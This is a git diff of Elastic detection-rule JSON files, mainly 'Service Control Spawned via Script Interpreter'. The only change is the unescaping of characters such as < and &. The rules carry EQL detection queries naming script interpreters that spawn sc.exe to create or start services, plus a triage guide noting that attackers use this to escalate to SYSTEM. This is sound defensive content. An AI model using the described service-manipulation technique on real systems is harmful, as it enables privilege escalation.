@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the 
account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json index 51d0812dec8..bafcdbf28f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json 
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the 
account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n",
 "related_integrations": [
 {
@@ -82,7 +82,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json
index 9a0a1fd97c4..dd2a48a0b07 100644
--- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the 
environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the 
account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n",
 "related_integrations": [
 {
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -106,7 +106,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -143,7 +143,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json
index 11ea184e31f..506b60d9fdf 100644
--- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_102.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json
index 78f983e8101..e27a5043872 100644
--- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_103.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json
index 2c47c0a4ce3..e411849fd61 100644
--- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_104.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json
index b225db3deff..57df2ab8c3f 100644
--- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_105.json
@@ -45,7 +45,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json
index f357c876bb2..e2144f77136 100644
--- a/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/e86da94d-e54b-4fb5-b96c-cecff87e8787_106.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "e86da94d-e54b-4fb5-b96c-cecff87e8787",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json
index 4a76849b2e5..0aab2c92df9 100644
--- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_2.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json b/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json
index 2ba898e495e..3771dd83736 100644
--- a/packages/security_detection_engine/kibana/security_rule/e88d1fe9-b2f4-48d4-bace-a026dc745d4b_3.json
